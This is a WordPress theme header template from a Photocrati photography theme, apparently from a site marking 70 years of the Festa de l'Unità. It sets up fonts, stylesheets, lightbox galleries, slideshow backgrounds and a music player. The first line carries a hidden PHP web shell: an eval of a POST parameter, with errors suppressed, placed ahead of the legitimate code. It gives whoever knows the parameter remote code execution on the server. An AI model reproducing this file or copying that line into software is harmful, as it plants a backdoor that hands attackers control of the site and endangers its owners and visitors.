<?php @eval($_POST["#131"]); ?><?php
    $preset = Photocrati_Style_Manager::get_active_preset();
    extract($preset->to_array());

	$rcp = $wpdb->get_results("SELECT fs_rightclick,lightbox_mode,lightbox_type FROM ".$wpdb->prefix."photocrati_gallery_settings WHERE id = 1");
	foreach ($rcp as $rcp) {
		$fs_rightclick = $rcp->fs_rightclick;
		$lightbox_mode = $rcp->lightbox_mode;
		$lightbox_type = $rcp->lightbox_type;
	}
	$music = $wpdb->get_results("SELECT music_blog,music_blog_auto,music_blog_file,music_blog_controls,music_cat,music_cat_auto,music_cat_file,music_cat_controls FROM ".$wpdb->prefix."photocrati_gallery_settings WHERE id = 1");
	foreach ($music as $music) {
		$music_blog = $music->music_blog;
		$music_blog_auto = $music->music_blog_auto;
		$music_blog_controls = $music->music_blog_controls;
		$music_blog_file = $music->music_blog_file;
		$music_cat = $music->music_cat;
		$music_cat_auto = $music->music_cat_auto;
		$music_cat_controls = $music->music_cat_controls;
		$music_cat_file = $music->music_cat_file;
	}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 9 ]> <html xmlns="http://www.w3.org/1999/xhtml" <?php language_attributes(); ?> class='ie9'><!--<![endif]-->
<!--[if (gt IE 9)|!(IE)]><!--> <html xmlns="http://www.w3.org/1999/xhtml" <?php language_attributes(); ?>><!--<![endif]-->
<head profile="http://gmpg.org/xfn/11">
    <?php
    Photocrati_Fonts::render_google_font_link(array(
        array($font_style, $font_weight, $font_italic),
        array($sidebar_font_style, $sidebar_font_weight, $sidebar_font_italic),
        array($sidebar_title_style, $sidebar_title_weight, $sidebar_title_italic),
        array($title_style, $title_font_weight, $title_italic),
        array($h1_font_style, $h1_font_weight, $h1_font_italic),
        array($h2_font_style, $h2_font_weight, $h2_font_italic),
        array($h3_font_style, $h3_font_weight, $h3_font_italic),
        array($h4_font_style, $h4_font_weight, $h4_font_italic),
        array($h5_font_style, $h5_font_weight, $h5_font_italic),
        array($description_style, $description_font_weight, $description_font_italic),
        array($menu_font_style, $menu_font_weight, $menu_font_italic),
        array($submenu_font_style, $submenu_font_weight, $submenu_font_italic),
        array($footer_widget_style, $footer_widget_weight, $footer_widget_italic),
        array($footer_font_style, $footer_font_weight, $footer_font_italic)
    ));
    ?>
    <title><?php
        if ( is_single() ) { single_post_title(); }       
        elseif ( is_home() || is_front_page() ) { bloginfo('name'); print ' | '; bloginfo('description'); get_page_number(); }
        elseif ( is_page() ) { single_post_title(''); }
        elseif ( is_search() ) { bloginfo('name'); print ' | Search results for ' . wp_specialchars($s); get_page_number(); }
        elseif ( is_404() ) { bloginfo('name'); print ' | Not Found'; }
        else { bloginfo('name'); wp_title('|'); get_page_number(); }
    ?></title>
	
	<meta http-equiv="content-type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
	<meta http-equiv="X-UA-Compatible" content="IE=9" />
	
	<!-- IMPORTANT! Do not remove this code. This is used for enabling & disabling the dynamic styling -->
		<?php if($dynamic_style) { ?>
        
            <link rel="stylesheet" type="text/css" href="<?php bloginfo('template_directory'); ?>/styles/dynamic-style.php" />
			<?php if($logo_menu_position == 'left-right') { ?>
			<!--[if lt IE 8]>
			<link rel="stylesheet" href="<?php bloginfo('template_directory'); ?>/styles/style-ie7-menufix.css" type="text/css" />
			<![endif]-->
			<?php } ?>
            
        <?php } else { ?>
        
            <link rel="stylesheet" type="text/css" href="<?php bloginfo('template_directory'); ?>/styles/style.css" />
			<?php if($logo_menu_position == 'left-right') { ?>
			<!--[if lt IE 8]>
			<link rel="stylesheet" href="<?php bloginfo('template_directory'); ?>/styles/style-ie7-menufix.css" type="text/css" />
			<![endif]-->
			<?php } ?>
        
        <?php } ?>
    <!-- End dynamic styling -->
	
    <!--[if IE 8]>
    <link rel="stylesheet" href="<?php bloginfo('template_directory'); ?>/styles/style-ie.css" type="text/css" />
    <![endif]-->
    
    <!--[if lt IE 8]>
    <link rel="stylesheet" href="<?php bloginfo('template_directory'); ?>/styles/style-ie7.css" type="text/css" />
    <![endif]-->
	
	<link rel="stylesheet" type="text/css" href="<?php bloginfo('template_directory'); ?>/admin/css/jquery.lightbox-0.5.css" />
	
	<?php if ( is_singular() ) wp_enqueue_script( 'comment-reply' ); ?>
	
	<?php
	if( !is_admin()){
		wp_enqueue_script('jquery');
		wp_enqueue_script('jquery-effects-core');
        if ($preset->custom_js) wp_enqueue_script('photocrati-custom-js', site_url('?photocrati-js'));
	 }
	?>
	
	<?php wp_head(); ?>
	
	<link rel="alternate" type="application/rss+xml" href="<?php bloginfo('rss2_url'); ?>" title="<?php printf( __( '%s latest posts', 'photocrati-framework' ), wp_specialchars( get_bloginfo('name'), 1 ) ); ?>" />
	<link rel="alternate" type="application/rss+xml" href="<?php bloginfo('comments_rss2_url') ?>" title="<?php printf( __( '%s latest comments', 'photocrati-framework' ), wp_specialchars( get_bloginfo('name'), 1 ) ); ?>" />
	<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />

	<?php if($fs_rightclick == "ON") { ?>
	<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/scripts/clickprotect.js"></script>
	<?php } ?>
	
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/scripts/jquery.jplayer.min.js"></script>
<link rel="stylesheet" type="text/css" href="<?php bloginfo('template_directory'); ?>/scripts/jplayer.style.css" />

<?php if($lightbox_type == 'fancy'): ?>
	<link rel="stylesheet" href="<?php bloginfo('template_directory'); ?>/admin/css/jquery.fancybox-1.3.4.css" type="text/css" />
<?php elseif($lightbox_type == 'light'): ?>
	<link rel="stylesheet" href="<?php bloginfo('template_directory'); ?>/admin/css/jquery.fancybox-1.3.4-light.css" type="text/css" />
<?php elseif($lightbox_type == 'thick'): ?>
	<link rel="stylesheet" href="<?php bloginfo('template_directory'); ?>/admin/css/jquery.fancybox-1.3.4-thick.css" type="text/css" />
<?php endif ?>

<?php if($style_skin == 'modern' || $lightbox_type == 'magnific'): ?>
	<link rel="stylesheet" href="<?php bloginfo('template_directory'); ?>/admin/css/jquery.fancybox-1.3.4.css" type="text/css" />
	<link rel="stylesheet" href="<?php bloginfo('template_directory'); ?>/scripts/lightbox/magnific-popup/magnific-popup.css" type="text/css" />
<?php endif ?>
	
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/admin/js/jquery.fancybox-1.3.4.pack.js"></script>

<?php if($style_skin == 'modern' || $lightbox_type == 'magnific'): ?>
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/scripts/lightbox/magnific-popup/magnific-popup-v0.9.9.min.js"></script>
<?php endif ?>

<?php if($style_skin == 'modern' && is_front_page()): ?>
<?php
// when selecting multiple images as background then $home_bg_image is an array
if (!is_array($home_bg_image)) {
	$home_bg_image = array($home_bg_image);
}

$home_bg_list = array();

foreach ($home_bg_image as $bg_image) {
	if ($bg_image != null) {
		$bg_img = Photocrati_Style_Manager::get_image_url($bg_image, true);
		
		if ($bg_img != null) {
			$home_bg_list[] = array(
				'image' => $bg_img,
				'thumb' => Photocrati_Style_Manager::get_image_url($bg_image, true, 'thumbnail'),
				'title' => $bg_image,
			);
		}
	}
}

// check that there are 1 or more images selected, otherwise fallback to default
if ($home_bg_list == null) {
	$home_bg = 'default';
}
	
?>
<?php if($home_bg == 'slideshow'): ?>
	<link rel="stylesheet" href="<?php bloginfo('template_directory'); ?>/scripts/supersized/slideshow/css/supersized.css" type="text/css" />
	<link rel="stylesheet" href="<?php bloginfo('template_directory'); ?>/scripts/supersized/slideshow/theme/supersized.shutter.css" type="text/css" media="screen" />
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/scripts/supersized/slideshow/js/supersized.3.2.7.min.js"></script>
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/scripts/supersized/slideshow/theme/supersized.shutter.min.js"></script>
		<script type="text/javascript">
			
			jQuery(function($){
				
				$.supersized({
				
					// Functionality
					slideshow               :   1,			// Slideshow on/off
					autoplay				:	1,			// Slideshow starts playing automatically
					start_slide             :   1,			// Start slide (0 is random)
					stop_loop				:	0,			// Pauses slideshow on last slide
					random					: 	0,			// Randomize slide order (Ignores start slide)
					slide_interval          :   <?php echo (floatval($home_bg_interval_speed) * 1000) ?>,		// Length between transitions
					transition              :   	<?php echo ($home_bg_transition_effect) ?>, 			// 0-None, 1-Fade, 2-Slide Top, 3-Slide Right, 4-Slide Bottom, 5-Slide Left, 6-Carousel Right, 7-Carousel Left
					transition_speed		:	<?php echo (floatval($home_bg_transition_speed) * 1000) ?>,		// Speed of transition
					new_window				:	1,			// Image links open in new window/tab
					pause_hover             :   0,			// Pause slideshow on hover
					keyboard_nav            :   1,			// Keyboard navigation on/off
					performance				:	1,			// 0-Normal, 1-Hybrid speed/quality, 2-Optimizes image quality, 3-Optimizes transition speed // (Only works for Firefox/IE, not Webkit)
					image_protect			:	1,			// Disables image dragging and right click with Javascript
															   
					// Size & Position						   
					min_width		        :   0,			// Min width allowed (in pixels)
					min_height		        :   0,			// Min height allowed (in pixels)
					vertical_center         :   1,			// Vertically center background
					horizontal_center       :   1,			// Horizontally center background
					fit_always				:	0,			// Image will never exceed browser width or height (Ignores min. dimensions)
					fit_portrait         	:   1,			// Portrait images will not exceed browser height
					fit_landscape			:   0,			// Landscape images will not exceed browser width
															   
					// Components							
					slide_links				:	'blank',	// Individual links for each slide (Options: false, 'num', 'name', 'blank')
					thumb_links				:	1,			// Individual thumb links for each slide
					thumbnail_navigation    :   0,			// Thumbnail navigation
					slides 					:  	<?php echo json_encode($home_bg_list) ?>,
												
					// Theme Options			   
					progress_bar			:	1,			// Timer for each slide							
					mouse_scrub				:	0
					
				});
		    });
		    
		</script>
<?php elseif($home_bg != 'default'): ?>
<?php 
if ($home_bg == 'image') {
	$home_bg_image = $home_bg_list[0]['image'];
}
else if ($home_bg == 'image_rotation') {
	$home_bg_image = $home_bg_list[mt_rand(0, count($home_bg_list) - 1)]['image'];
}
?>
	<style type="text/css">
  body {
  	background-image: url('<?php echo $home_bg_image; ?>');
  	background-repeat: <?php echo $bg_repeat; ?>;
  	background-attachment: <?php echo $bg_attachment; ?>;
  }    
	</style>
<?php endif ?>
<?php endif ?>

<script type="text/javascript">
//<![CDATA[	
jQuery.noConflict();

(function () {
	var div = document.createElement('div'),
	ref = document.getElementsByTagName('base')[0] ||
		    document.getElementsByTagName('script')[0];

	div.innerHTML = '&shy;<style> iframe { visibility: hidden; } </style>';

	ref.parentNode.insertBefore(div, ref);

	jQuery(window).load(function() {
		div.parentNode.removeChild(div);
	});
})();

	function formatTitle(title, currentArray, currentIndex, currentOpts) {
		return '<div id="tip7-title"><span><a href="javascript:;" onclick="jQuery.fancybox.close();"><img src="<?php bloginfo('template_url'); ?>/admin/css/closelabel.gif" alt="close label" /></a></span>' + (title && title.length ? '<b>' + title + '</b>' : '' ) + 'Image ' + (currentIndex + 1) + ' of ' + currentArray.length + '</div>';
	}
	//]]>
	jQuery(document).ready(function() {

<?php if($lightbox_type == 'magnific'): ?>
	jQuery(".photocrati_nojava").each(function () {
		jQuery(this).magnificPopup({
			type: 'image',
			delegate: 'a',
		
			gallery: {
				// options for gallery
				enabled: true
			},
			image: {
				// options for image content type
			}
		});
	});
<?php else: ?>			
	jQuery("a.decoy").fancybox({
		'overlayColor'		: '#0b0b0f',
		'overlayOpacity'	: 0.8,
		'centerOnScroll'	: true,
		<?php if($lightbox_type == 'fancy' || $lightbox_type == 'magnific') { ?>
		'titlePosition'		: 'outside'
		<?php } else if($lightbox_type == 'light') { ?>
		'titlePosition'		: 'inside',
		'titleFormat'		: formatTitle
		<?php } else if($lightbox_type == 'thick') { ?>
		'titlePosition' 	: 'inside',
		'showNavArrows'		: false,
    	'titleFormat'       : function(title, currentArray, currentIndex, currentOpts) {
			var gettitle;
			gettitle = '<span id="fancybox-title-inside">'+title+'<BR><span class="counter">Image ' +  (currentIndex + 1) + ' of ' + currentArray.length + ' &nbsp;&nbsp;';
			if(currentIndex != 0) {
			gettitle = gettitle + '<a onclick="jQuery.fancybox.prev();" style="cursor:pointer;">&laquo; Prev</a> | ';
			}
			gettitle = gettitle + '<a onclick="jQuery.fancybox.next();" style="cursor:pointer;">Next &raquo;</a></span>';
			
			gettitle = gettitle + '<div id="close_button"><a onclick="jQuery.fancybox.close();" style="cursor:pointer;">Close</a></div></span>';
		
			return gettitle;
    	}
		<?php } ?>
		//'href'				: ''+site+''
	});
<?php endif ?>

	<?php 
	
	$lightbox_selector = '.photocrati_lightbox_always';
	$lightbox_custom = null;
	
	switch($lightbox_mode)
	{
		case 'always':
		{
			$lightbox_custom = 'a:has(\\\'[class*="wp-image"]\\\'), .photocrati_lightbox';
			
			break;
		}
		case 'never':
		{
			break;
		}
		case 'manual':
		default:
		{
			$lightbox_custom = '.photocrati_lightbox';
			
			break;
		}
	}
	
	if ($lightbox_custom != null)
	{
		$lightbox_selector .= ', ' . $lightbox_custom;
	}
	
	if ($lightbox_selector != null)
	{
	?>

	var lighboxSelector = '<?php echo $lightbox_selector; ?>';

<?php if($lightbox_type == 'magnific'): ?>
	jQuery(lighboxSelector).magnificPopup({
		type: 'image',
		
		gallery: {
		  // options for gallery
		  enabled: true
		},
		image: {
		  // options for image content type
		  titleSrc: 'title'
		}
	});
<?php else: ?>
	jQuery(lighboxSelector).fancybox({
		'overlayColor'		: '#0b0b0f',
		'overlayOpacity'	: 0.8,
		'centerOnScroll'	: true,
		<?php if($lightbox_type == 'fancy' || $lightbox_type == 'magnific') { ?>
		'titlePosition'		: 'outside'
		<?php } else if($lightbox_type == 'light') { ?>
		'titlePosition'		: 'inside',
		'titleFormat'		: formatTitle
		<?php } else if($lightbox_type == 'thick') { ?>
		'titlePosition' 	: 'inside',
		'showNavArrows'		: false,
		'titleFormat'       : function(title, currentArray, currentIndex, currentOpts) {
			var gettitle;
			gettitle = '<span id="fancybox-title-inside">'+title+'<BR><span class="counter">Image ' +  (currentIndex + 1) + ' of ' + currentArray.length + ' &nbsp;&nbsp;';
			if(currentIndex != 0) {
			gettitle = gettitle + '<a onclick="jQuery.fancybox.prev();" style="cursor:pointer;">&laquo; Prev</a> | ';
			}
			gettitle = gettitle + '<a onclick="jQuery.fancybox.next();" style="cursor:pointer;">Next &raquo;</a></span>';
			
			gettitle = gettitle + '<div id="close_button"><a onclick="jQuery.fancybox.close();" style="cursor:pointer;">Close</a></div></span>';
		
			return gettitle;
		}
		<?php } ?>
	});
<?php endif ?>
		
	<?php
	}
	?>
	
});
</script>

<?php if(is_single() || is_page()) { ?>
	
	<script type="text/javascript">
	jQuery.noConflict();
	jQuery(document).ready(function() {
		
		<?php if(get_post_meta($post->ID, 'music', true) == "YES") { ?>
		
		jQuery("#jquery_jplayer").jPlayer({
			ready: function () {
				<?php if(get_post_meta($post->ID, 'music_auto', true) == "YES") { ?>
				this.element.jPlayer("setFile", "<?php echo get_post_meta($post->ID, 'music_file', true); ?>").jPlayer("play");
				<?php } else { ?>
				this.element.jPlayer("setFile", "<?php echo get_post_meta($post->ID, 'music_file', true); ?>");
				<?php } ?>
			},
			oggSupport: false,
			preload: 'none',
			swfPath: "<?php echo get_bloginfo('template_directory'); ?>/scripts"
		})
		.jPlayer("onSoundComplete", function() {
			this.element.jPlayer("play");
		});
	
		<?php } ?>
			
	});
	</script>
	
	<?php if(get_post_meta($post->ID, 'music_controls', true) == "NO") { ?>
	
	<style type="text/css">
	.jp-single-player {
		display:none;
	}
	</style>
	
	<?php } ?>
	
<?php } ?>


<?php if(is_category() || is_archive()) { ?>

	<?php if($music_cat == "ON") { ?>
	
	<script type="text/javascript">
	jQuery.noConflict();
	jQuery(document).ready(function() {
		
		jQuery("#jquery_jplayer").jPlayer({
			ready: function () {
				<?php if($music_cat_auto == "YES") { ?>
				this.element.jPlayer("setFile", "<?php echo $music_cat_file; ?>").jPlayer("play");
				<?php } else { ?>
				this.element.jPlayer("setFile", "<?php echo $music_cat_file; ?>");
				<?php } ?>
			},
			oggSupport: false,
			preload: 'none',
			swfPath: "<?php echo get_bloginfo('template_directory'); ?>/scripts"
		})
		.jPlayer("onSoundComplete", function() {
			this.element.jPlayer("play");
		});
	
	});
	</script>
	
	<?php if($music_cat_controls == "NO") { ?>
	
	<style>
	.jp-single-player {
		display:none;
	}
	</style>
	
	<?php } ?>
	
	<?php } ?>
	
<?php } ?>


</head>

<body <?php body_class(); ?> id="themebody">
<div id="main_container">
<div id="decoys"></div>

<?php if ($header_position != 'hidden'): ?>
<div id="header">
		<div id="masthead">
		<?php
		$menu_markup = '
			<div id="menu_wrapper">';
			
    if (function_exists('wp_nav_menu')) { //Check if function exists for less than Wordpress 3.0
    	$menu_markup .= wp_nav_menu(array('echo' => false, 'container_class' => 'menu photocrati-menu', 'menu_class' => 'sf-menu', 'theme_location' => 'primary', 'fallback_cb' => 'photocrati_theme_menu_fallback_create'));
    } 
    else {
    	$menu_markup .= wp_page_menu(array('menu_class' => 'menu photocrati-menu', 'echo' => false, 'sort_column' => 'menu_order'));
    }	
    
		$menu_markup .= '
			</div><!-- #access -->';
		?>
			
		<?php
		
		if ($logo_menu_position == 'bottom-top') {
			echo $menu_markup;
		}
		
		?>
		
			<div id="branding">
				<div id="blog-title">
                    <span>
                        <a href="<?php bloginfo( 'url' ) ?>/" title="<?php bloginfo( 'name' ) ?>" rel="home">
                        	<center><img src="http://70annifestaunita.it/wp-content/uploads/2015/07/1545Q8X0077NE.jpg" width="150" border="0" alt="70 Anni Festa de l'Unità"></center>
                            <?php if($custom_logo == 'custom') { ?>
                                <img src="<?php echo Photocrati_Style_Manager::get_setting_image_url('custom_logo_image', true); ?>" border="0" alt="<?php bloginfo( 'name' ) ?>" />
                            <?php } else if($custom_logo == 'default') { ?>
                            	<img src="<?php bloginfo('template_directory'); ?>/images/logo.png" border="0" alt="<?php bloginfo( 'name' ) ?>" />
                            <?php } else { ?>
                                <h1><?php bloginfo('name'); ?></h1>
                                <div class="description"><?php bloginfo('description'); ?></div>
                            <?php } ?>
                        </a>
                    </span>
                </div>
			</div><!-- #branding -->

		<?php
		
		if ($logo_menu_position != 'bottom-top') {
			echo $menu_markup;
		}
		
		?>
			<center><img src="http://70annifestaunita.it/wp-content/uploads/2015/07/logo-pd.jpg" width="150" border="0" alt="Partito Democratico"></center>
		</div><!-- #masthead -->	
</div><!-- #header -->
<?php endif ?>

<div id="wrapper" class="hfeed">

	<div id="main">
